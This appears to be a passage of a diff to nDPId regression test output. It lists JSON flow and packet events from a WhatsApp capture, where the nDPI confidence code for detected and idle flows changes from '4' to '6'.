00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1655036863694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655036863694,"pkt":"eJS0JASgYDjgxTWgCABFAAA0VU5AAD8GrPvAqAJkszzDMZ\/6FGZJAAaPQBkrQIAQAIAuZAAAAQEICjdq8tim3M31"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1655036863777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655036863777,"pkt":"eJS0JASgYDjgxTWgCABFAAA4VU9AAD8GrPbAqAJkszzDMZ\/6FGZJAAaPQBkrQIAYAIDovgAAAQEICjdq8yym3M31RUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655036863658,"flow_last_seen":1655036863823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655036863823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655036863658,"flow_last_seen":1655036863823,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655036863823,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40954,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":4075,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":9,"total-active-flows":9,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":53,"global_ts_msec":1655037784969} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655037784969,"flow_last_seen":1655037784969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655037784969,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1655037784969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655037784969,"pkt":"eJS0JASgYDjgxTWgCABFAAA8eZJAAD8GiK\/AqAJkszzDMaD+FGaPGwMEAAAAAKAC\/\/\/PkAAAAgQFtAQCCAo3eL\/2AAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1655037785024,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655037785024,"pkt":"eJS0JASgYDjgxTWgCABFAAA0eZNAAD8GiLbAqAJkszzDMaD+FGaPGwMFTC+Ch4AQAIA0RwAAAQEICjd4wGKeH1xF"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1655037785072,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655037785072,"pkt":"eJS0JASgYDjgxTWgCABFAAA4eZRAAD8GiLHAqAJkszzDMaD+FGaPGwMFTC+Ch4AYAIDu7QAAAQEICjd4wGqeH1xFRUQAAQ=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037784969,"flow_last_seen":1655037785114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655037785114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037784969,"flow_last_seen":1655037785114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655037785114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41214,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655037943346,"flow_last_seen":1655037943346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655037943346,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1655037943346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655037943346,"pkt":"eJS0JASgYDjgxTWgCABFAAA8ZIBAAD8GndHAqAJkszzDIb+CFGZJeEW8AAAAAKAC\/\/\/DuQAAAgQFtAQCCApZCY6zAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1655037943378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655037943378,"pkt":"eJS0JASgYDjgxTWgCABFAAA0ZIFAAD8GndjAqAJkszzDIb+CFGZJeEW9lbThyYAQAKz4BQAAAQEIClkJjtOTiu6c"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1655037943378,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655037943378,"pkt":"eJS0JASgYDjgxTWgCABFAAA4ZIJAAD8GndPAqAJkszzDIb+CFGZJeEW9lbThyYAYAKyyswAAAQEIClkJjtSTiu6cRUQAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037943346,"flow_last_seen":1655037943383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655037943383,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655037943346,"flow_last_seen":1655037943383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655037943383,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":49026,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":90,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":90,"packets-processed":89,"total-skipped-flows":0,"total-l4-payload-len":6885,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":11,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":64,"global_ts_msec":1655038737650} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655038737650,"flow_last_seen":1655038737650,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655038737650,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1655038737650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655038737650,"pkt":"eJS0JASgYDjgxTWgCABFAAA8+jpAAD8GCAfAqAJkszzDMaFIFGaFGhCGAAAAAKAC\/\/9PGwAAAgQFtAQCCAo3gTyYAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1655038737824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655038737824,"pkt":"eJS0JASgYDjgxTWgCABFAAA0+jtAAD8GCA7AqAJkszzDMaFIFGaFGhCH4E9fBoAQAIAQ0gAAAQEICjeBPUjxtjrK"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1655038738001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655038738001,"pkt":"eJS0JASgYDjgxTWgCABFAAA4+jxAAD8GCAnAqAJkszzDMaFIFGaFGhCH4E9fBoAYAIDK4wAAAQEICjeBPeXxtjrKRUQAAQ=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655038737650,"flow_last_seen":1655038738036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655038738036,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655030801747,"flow_last_seen":1655030802079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1537,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1655038738381,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655038737650,"flow_last_seen":1655038738036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655038738036,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1655030801747,"flow_last_seen":1655030802079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":1537,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1655038738381,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":44804,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":98,"packets-processed":97,"total-skipped-flows":0,"total-l4-payload-len":7219,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":12,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":1655041569928} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655041569928,"flow_last_seen":1655041569928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655041569928,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1655041569928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655041569928,"pkt":"eJS0JASgYDjgxTWgCABFAAA8yNhAAD8GOWnAqAJkszzDMaKKFGb8FC6CAAAAAKAC\/\/\/RUwAAAgQFtAQCCAo3qCQAAAAAAAEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1655041569964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655041569964,"pkt":"eJS0JASgYDjgxTWgCABFAAA0yNlAAD8GOXDAqAJkszzDMaKKFGb8FC6DekSzAYAQAIDQKAAAAQEICjeoJCQj994H"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1655041570092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655041570092,"pkt":"eJS0JASgYDjgxTWgCABFAAA4yNpAAD8GOWvAqAJkszzDMaKKFGb8FC6DekSzAYAYAICKaAAAAQEICjeoJJMj994HRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655041569928,"flow_last_seen":1655041570160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655041570160,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033797377,"flow_last_seen":1655033797657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655031983762,"flow_last_seen":1655031984056,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033482376,"flow_last_seen":1655033482899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033850395,"flow_last_seen":1655033851037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032256845,"flow_last_seen":1655032257332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032857220,"flow_last_seen":1655032858052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655041569928,"flow_last_seen":1655041570160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655041570160,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033797377,"flow_last_seen":1655033797657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42646,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655031983762,"flow_last_seen":1655031984056,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033482376,"flow_last_seen":1655033482899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40178,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655033850395,"flow_last_seen":1655033851037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40204,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032256845,"flow_last_seen":1655032257332,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42272,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":106,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655032857220,"flow_last_seen":1655032858052,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655041570363,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":42436,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 